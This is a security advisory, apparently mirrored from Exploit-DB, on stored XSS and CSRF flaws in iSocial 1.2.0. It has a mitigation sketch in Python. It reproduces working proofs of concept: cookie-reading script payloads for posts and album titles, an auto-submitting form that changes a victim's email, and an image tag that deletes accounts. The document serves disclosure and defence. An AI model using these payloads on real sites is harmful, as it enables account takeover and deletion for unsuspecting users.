Vendor: iSocial
By: Borna nematzadeh (L0RD)
N/A
CVSS
MEDIUM
Cross-Site Scripting / Cross-Site Request Forgery
CWE: 79
Product Name: iSocial
Affected Version From: 1.2.2000
Affected Version To: 1.2.2000
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2018

iSocial 1.2.0 – Cross-Site Scripting / Cross-Site Request Forgery

iSocial 1.2.0 is vulnerable to Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks. The XSS vulnerability allows an attacker to inject malicious scripts into the website, which then execute in the browsers of unsuspecting users. The CSRF vulnerability allows an attacker to perform unauthorized actions on behalf of a victim user, such as changing their email or deleting their account.

Mitigation:

To mitigate the XSS vulnerability, it is recommended to implement proper input validation and output encoding. To mitigate the CSRF vulnerability, it is recommended to implement CSRF tokens and enforce strict referer checks.
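
One way to apply these mitigations, as an added sketch that is not iSocial's code and not part of the original advisory: context-aware output encoding for post bodies and album titles, plus a gate for state-changing requests that requires POST, a same-origin Origin/Referer header, and a session-bound token. The names SECRET_KEY, TRUSTED_ORIGIN, the csrf_token form field and all function names are assumptions made for illustration.

```python
import hashlib
import hmac
import html
import secrets
from urllib.parse import urlsplit

# Assumed values for this sketch; none of these names come from iSocial.
SECRET_KEY = secrets.token_bytes(32)        # per-deployment secret
TRUSTED_ORIGIN = "https://social.example"   # the site's own origin


def render_post(body):
    """Encode user text for an HTML element context (a post body)."""
    return "<p>" + html.escape(body, quote=True) + "</p>"


def render_album_title(title):
    """Encode user text for a double-quoted attribute (an album title field)."""
    return '<input type="text" name="title" value="' + html.escape(title, quote=True) + '" />'


def issue_csrf_token(session_id):
    """HMAC of the server-side session id; embed it in every state-changing form."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(url):
    """True only when scheme and host[:port] match the trusted origin exactly."""
    if not url:
        return False
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def allow_state_change(method, headers, form, session_id):
    """Gate for actions such as an email change or an account deletion."""
    if method != "POST":               # a GET (for example an image load) never changes state
        return False
    source = headers.get("Origin") or headers.get("Referer")
    if not same_origin(source):        # strict: a missing or foreign header is rejected
        return False
    sent = form.get("csrf_token", "")
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(sent.encode(), expected.encode())
```
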
Source

Exploit-DB raw data:

# Exploit Title: iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery
# Date: 2018-05-22
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/isocial-social-network-platform/21164041?s_rank=2
# Version: 1.2.0
# Tested on: Kali linux

# POC 1 : Cross-Site scripting:

1) Create your account and navigate to "write post".
2) Put this payload and click on "post" :
<script>alert(document.cookie)</script>
3) You will have an alert box in your page .

# POC 2 : Cross-Site Scripting:

1) Navigate to "Albums" and click on "create album"
2) In title field , put this payload :
"/><script>alert(document.cookie)</script>
3) In both cases, the payload will be executed after someone opens your album or your profile.

# POC 3 : Cross-Site Request Forgery:
# iSocial - Social Network Platform 1.2.0 suffers from csrf vulnerability .
# Attacker can easily change user's email or delete user's account .

# Change email Exploit :

<html>
<head>
   <title>CSRF POC</title>
</head>
  <body>
    <form action="http://Target/isocial/demo/services/actionssetting/email" method="POST">
      <input type="hidden" name="em" value="lord2&#64;gmail&#46;com" />
    </form>
    <script>
        document.forms[0].submit();
    </script>
  </body>
</html>

# Result :
# html    "The information has been updated"
# status    "OK"
# message    ""

# Delete account Exploit:

<img src="http://Target/isocial/demo/services/actionssetting/delete">